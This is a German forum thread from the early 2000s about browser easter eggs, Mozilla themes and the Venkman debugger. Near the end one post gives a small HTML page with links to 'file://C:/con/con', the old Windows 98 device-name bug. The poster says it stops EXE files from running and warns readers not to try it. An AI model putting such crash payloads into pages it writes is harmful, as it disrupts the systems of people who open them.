IE Extra CRASH Function ?

musst mal nach eastereggs in google suchen ... da gibts internetseiten auf denen masssenweise eastereggs gepostet sind und wie man die findet ... da muss man irgendwo in zeile 32xxx irgendwas reinschreiben etc .... weis es nimmer genau ... is aber n ganz billiges spiel so wie aufm atari 2600 damals ungefaehr (n bissl besser noch), aber witzig :D

hier z.b

zitat aus google:
Easter Eggs
... Die beliebtesten Easter Eggs. Excel 2000 - Autorennen, GTA 3 - Diverse Gags, Nokia
5x, 6x - Service-Menü, Der Herr der Ringe - Special Extended Version - Parodie, ...
Beschreibung: Sammlung von Software Ostereiern in verschiedenen Programmen.
Kategorie: World > Deutsch > Freizeit > Humor > Computer > Eastereggs
http://www.mogelpower.de/easter/ - 11k - Im Cache - Ähnliche Seiten


hier die google suche:

http://www.google.de/search?hl=de&ie=UTF-8&oe=UTF-8&q=eastereggs&meta=

viel spass beim eier suchen
 
Hier für die IE-User mal....wie das aussieht, wenn man sich an geltende Standarts beim Programmieren von Webbrowsern hält.

SCREENSHOT (Mozilla V1.3)

Gruß
Rodger
 
@Rodger

woher hast du eigentlich deinen Skin !? :)
 
danke :)
 
Bitte :)

Orbit ist aber auch ein feines Theme.
Nur schade, das für Mozilla kaum noch geskinned wird, weil Firebird (früher Phoenix) ihn ablösen soll. Thunderbird, der Mail-Client, gibt es auch schon als seperaten download.
Aber als Web-Developer kann ich ohne Mozilla nicht leben :), der hat so geniale Features wie z.b den Javascript Debugger "Venkman".
 
Zuletzt bearbeitet:
wie schalt ich den Debugger ein !? kenn mich mit Mozilla (noch) ned so aus ...

... a hab's schon ;)
 
Zuletzt bearbeitet:
Hey leute übrigens , ich habe eine methode fuer meinen browser ausgedacht , dass er bei solchen biligen code fehler net abkackt !

weiss net ob's jemanden interesiert , aber :)

übrigens sorry war als soul_of_savior angemeldet :(
 
Moment, da gab's doch noch so was, oder?

Ah, ja richtig:

Code:
<html>
<head><title>Abkacken für Anfänger</title></head>
<body>

<a href="file://C:/con/con">Klick mich!</a>
<a href="C:/con/con">Oder mich</a>

</body>
</html>

Das Ding verursacht bei Win98, dass keine EXE-Files mehr ausgeführt werden oder so! Keine Ahnung, ob man das rückgängig machen kann, also lieber nicht versuchen!

Google...denke mal, da findet man was unter "con-bug"!

S†ay Dark!

Schattenkanzler
 
Zurück
Oben